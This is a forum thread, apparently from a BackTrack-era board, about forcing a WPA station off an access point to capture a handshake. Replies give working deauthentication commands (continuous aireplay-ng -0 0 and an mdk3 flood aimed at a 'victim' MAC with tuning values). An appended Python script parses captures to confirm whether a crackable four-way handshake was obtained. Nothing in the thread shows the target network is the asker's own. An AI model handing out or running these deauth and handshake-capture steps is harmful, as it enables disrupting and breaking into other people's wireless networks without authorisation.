Hi,
I've been patient for several hours trying to deauth a station to get a handshake and have been unsuccessful. Maybe I'm not doing something correctly.
The AP is WPA TKIP PSK, and I have airodump-ng running in a shell locked to that AP's channel and AP MAC, and it shows a station connected.
In another shell I run aireplay-ng -0 1 -a <AP MAC> -c <STATION MAC> <device>
Several times I have sequenced aireplay-ng -0 10, and once -0 100.
I have tried aireplay-ng -0 1 -a <AP MAC> <device> and see only one station.
PWR level is at 34, so I think I am getting a signal to it.
Any suggestions?
I am using BT3b
Thanks.
Hi,
Remember that just because you are close enough to see the AP it does not always mean you are close enough to send data to a connected client.
Removed by -=Xploitz=-
We do NOT allow external links. We only allow "internal" links to our forums. See PMs.
Yeah, try walking over to his house and sit on the front porch to do it, you will get a better signal that way.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
Then eventually the station would need to re-authorize, correct? For some reason or another, and if I was monitoring I'd get the handshake, correct?
I'm using an Alfa 1/2 watt device. I think I should be able to get to the station...
Funny, 'cause I can't auth with the WPA AT HOME!
@ attitude,
Try running aireplay-ng -0 0 -a <AP MAC> -c <STATION MAC> <device>
That should continuously deauth; leave it running until you see you have a handshake in airodump. That's always worked for me, at least. Also, like harry said, being close doesn't always mean you will be successful. I've been distant before with a very low power level, and the weirdest thing: when my USB optical mouse was positioned just a certain way close to my wireless card, it somehow made injection work. If I moved it away from my card, injection stopped, but if I moved it closer and positioned it a certain way, it worked just fine.
Hope that helps some.
I prefer a trickier but effective way:
Create a blacklist file containing the MAC of the victim.
Run an mdk3 deauth / amok flood.
Adjust delay to 1.
Adjust packets/burst to 500.
Adjust speed to 1024.
Before launching that, try lowering your rate to 1M in order to get more clients when scanning.
This way, it's a continuous deauth EACH TIME THE CLIENT REQUESTS A SINGLE BIT OF TRAFFIC,
so you get the handshake for sure, but it needs a little more work.
This function will be available in ezpawn and is available in charon, my GUIs which hold some mdk3 functions (charon holds all).
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
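Both the aireplay-ng -0 0 suggestion and the mdk3 amok-flood suggestion above end the same way: leave the deauth running until airodump-ng reports a handshake. What airodump's "WPA handshake" banner does not tell you is how many of the four EAPOL-Key messages you actually captured, whether the replay counters pair up, or whether the deauth frames themselves even appear in your capture (if they don't, your card is not injecting, whatever the PWR column says). The script below is an added example, not code from the original thread or from the aircrack-ng or mdk3 projects. It parses a pcap of raw 802.11 frames (link type 105, no radiotap header, no FCS, which is an assumption about how the capture was written), counts deauthentication frames per sender/receiver pair, classifies EAPOL-Key messages 1 to 4 by their Key Information bits, and reports whether a crackable pair (M1+M2 with matching replay counters, or M2+M3 with M3's counter one higher) is present. The AP and station MACs, the WPA IE bytes and the two sample captures are constructed inline for the demonstration.

```python
"""Check a raw-802.11 pcap for deauth frames and WPA 4-way handshake messages (added example)."""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105                      # raw 802.11 frames, no radiotap header
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC = 0x0008, 0x0040, 0x0080, 0x0100  # Key Info bits


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def pcap_packets(data):
    """Yield each frame from a classic little-endian pcap file."""
    magic, = struct.unpack_from("<I", data, 0)
    linktype, = struct.unpack_from("<I", data, 20)
    if magic != 0xA1B2C3D4 or linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian pcap with link type 105")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl, _orig = struct.unpack_from("<IIII", data, off)
        off += 16
        yield data[off:off + incl]
        off += incl


def classify_key(key_info, key_data_len):
    """Map EAPOL-Key flags to handshake message number, mirroring the usual aircrack rules."""
    if not key_info & KI_PAIRWISE:
        return None
    install, ack, mic = key_info & KI_INSTALL, key_info & KI_ACK, key_info & KI_MIC
    if ack and not mic and not install:
        return 1
    if mic and ack and install:
        return 3
    if mic and not ack and not install:
        return 2 if key_data_len else 4       # M2 carries the RSN/WPA IE, M4 carries nothing
    return None


def analyze(pcap):
    """Return ({(sender, receiver): deauth count}, {(bssid, sta): handshake report})."""
    deauths = defaultdict(int)
    handshakes = defaultdict(lambda: defaultdict(set))   # (bssid, sta) -> msg -> replay counters
    for frame in pcap_packets(pcap):
        if len(frame) < 24:
            continue
        fc0, flags = frame[0], frame[1]
        ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
        a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
        if ftype == 0 and subtype == 12:                 # management / deauthentication
            deauths[(mac(a2), mac(a1))] += 1
            continue
        if ftype != 2 or subtype & 0x4:                  # not data, or a null-data frame
            continue
        hdr = 24 + (2 if subtype & 0x8 else 0)           # QoS data adds a 2-byte QoS control field
        ds = flags & 0x3
        if ds == 0x1:                                    # To-DS: station -> AP
            bssid, sta = a1, a2
        elif ds == 0x2:                                  # From-DS: AP -> station
            bssid, sta = a2, a1
        else:
            continue
        body = frame[hdr:]
        if not body.startswith(LLC_SNAP_EAPOL):
            continue
        eapol = body[8:]
        if len(eapol) < 4 + 95 or eapol[1] != 3:         # EAPOL type 3 = EAPOL-Key
            continue
        key = eapol[4:]                                  # descriptor, key info, key len, replay, ...
        key_info = struct.unpack_from(">H", key, 1)[0]
        replay = struct.unpack_from(">Q", key, 5)[0]
        key_data_len = struct.unpack_from(">H", key, 93)[0]
        msg = classify_key(key_info, key_data_len)
        if msg:
            handshakes[(mac(bssid), mac(sta))][msg].add(replay)
    report = {}
    for pair, msgs in handshakes.items():
        have = sorted(msgs)
        usable = bool(msgs[1] & msgs[2]) or any(r + 1 in msgs[3] for r in msgs[2])
        report[pair] = {"messages": have, "usable": usable}
    return dict(deauths), report


# ---- constructed sample captures (not real traffic) -----------------------------------
AP, STA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
WPA_IE = bytes.fromhex("dd160050f20101000050f20201000050f20201000050f202")  # TKIP/PSK


def frame_80211(fc0, flags, a1, a2, a3, body):
    return bytes([fc0, flags]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body


def deauth(dst, src, bssid, reason=7):
    return frame_80211(0xC0, 0x00, dst, src, bssid, struct.pack("<H", reason))


def eapol_key(from_ap, key_info, replay, key_data=b""):
    key = (bytes([254]) + struct.pack(">HHQ", key_info, 32, replay) + bytes(80)   # WPA descriptor
           + struct.pack(">H", len(key_data)) + key_data)
    eapol = bytes([1, 3]) + struct.pack(">H", len(key)) + key
    if from_ap:
        return frame_80211(0x08, 0x02, STA, AP, AP, LLC_SNAP_EAPOL + eapol)
    return frame_80211(0x08, 0x01, AP, STA, AP, LLC_SNAP_EAPOL + eapol)


def pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out


DEAUTHS = [deauth(STA, AP, AP), deauth(AP, STA, AP)] * 3       # both directions, like aireplay -0
PARTIAL_CAPTURE = pcap(DEAUTHS + [eapol_key(True, 0x0089, 1)])   # only M1: client reply never seen
FULL_CAPTURE = pcap(DEAUTHS + [eapol_key(True, 0x0089, 1), eapol_key(False, 0x0109, 1, WPA_IE),
                               eapol_key(True, 0x01C9, 2, WPA_IE), eapol_key(False, 0x0109, 2)])

if __name__ == "__main__":
    for name, cap in (("partial", PARTIAL_CAPTURE), ("full", FULL_CAPTURE)):
        print(name, analyze(cap))
```

Run it as-is to see both reports, or replace the constructed captures with `open("capture.cap", "rb").read()` from airodump-ng. A report listing only message 1 means the AP answered the deauth but the station's reply never reached your card, which is exactly the "I can see the AP but not the client" situation the replies above describe; a capture with no deauth frames at all means injection is not working.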